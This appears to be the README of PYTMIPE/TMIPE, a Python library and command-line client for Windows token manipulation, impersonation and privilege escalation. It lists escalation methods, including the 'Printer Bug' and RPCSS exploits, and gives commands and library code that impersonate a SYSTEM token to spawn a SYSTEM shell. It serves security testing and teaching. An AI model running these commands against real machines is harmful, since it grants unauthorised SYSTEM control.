
Python library and client for token manipulations and impersonations for privilege escalation on Windows
PYTMIPE (PYthon library for Token Manipulation and Impersonation for Privilege Escalation) is a Python 3 library for manipulating Windows tokens and managing impersonations in order to gain more privileges on Windows. TMIPE is the python 3 client which uses the pytmipe library.
Slides "Windows Token Manipulation, Impersonation & Privilege Escalation" (English): link
Article in MISC 112 (French): link
| Method | Required Privilege(s) | OS (no exhaustive) | Direct target (max) |
|---|---|---|---|
| Token creation & impersonation | username & password | All | local administrator |
| Token Impersonation/Theft | SeDebugPrivilege | All | nt authority\system |
| Parent PID spoofing (handle inheritance) | SeDebugPrivilege | >= Vista | nt authority\system |
| Service (SCM) | Local administrator (and high integrity level if UAC enabled) | All | nt authority\system or domain account |
| WMI Event | Local administrator (and high integrity level if UAC enabled) | All | nt authority\system |
| « Printer Bug » LPE | SeImpersonatePrivilege (Service account) | Windows 8.1, 10 & Server 2012R2/2016/2019 | nt authority\system |
| RPCSS Service LPE | SeImpersonatePrivilege (Service account) | Windows 10 & Server 2016/2019 | nt authority\system |
The following non-exhaustive list shows some features implemented in pytmipe library:
ctypes is used a maximum of time. Many features of pywin32 have been re developped in pytmipe to avoid the use of pywin32 for better portability. However, Task Scheduler module still uses pywin32 (more precisely pythoncom) by lack of time. All other modules uses ctypes only.
For python client (named tmipe):
python.exe tmipe.py -h
usage: tmipe.py [-h] [--version]
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
...
**
888888 8b d8 88 88""Yb 888888
88 88b d88 88 88__dP 88__
88 88YbdP88 88 88""" 88""
88 88 YY 88 88 88 888888
-------------------------------------------
Token Manipulation, Impersonation and
Privilege Escalation (Tool)
-------------------------------------------
By Quentin HARDY ([email protected])
positional arguments:
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
Choose a main command
cangetadmin Check if user can get admin access
printalltokens Print all tokens accessible from current thread
printalltokensbyname
Print all tokens accessible from current thread by account name
printalltokensbypid Print all tokens accessible from current thread by pid
printsystemtokens Print all system tokens accessible from current
searchimpfirstsystem
search and impersonate first system token
imppid impersonate primary token of selected pid and try to spawn cmd.exe
imptoken impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe
printerbug exploit the "printer bug" for getting system shell
rpcss exploit "rpcss" for getting system shell
spoof parent PID Spoofing ("handle inheritance)"
impuser create process with creds with impersonation
runas create process with creds as runas
scm create process with Service Control Manager
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
For python library (named pytmipe), see source code and examples. Normally, I have well documented the source code... Most of functions are documented.
For pyinstaller examples and standalones, see files in src/examples/ folders.
If you want to know how to use pytimpe library, see src/examples folder for many examples.
For impersonating the first system token and get a cmd.exe prompt as system from python client (tmipe):
python.exe tmipe.py searchimpfirstsystem -vv
For doing the same thing thanks to the pytmipe library directly, see the src/examples/searchAndImpersonateFirstSystemToken.py:
from impersonate import Impersonate
from utils import configureLogging
configureLogging()
imp = Impersonate()
imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)
It will open a cmd.exe prompt as system if the current Windows user has required rights.
Of course, from this source code, you can create a standlone exe with pyinstaller.
For getting primary and impersonation(s) tokens used in current process:
python.exe tmipe.py printalltokens --current --full --linked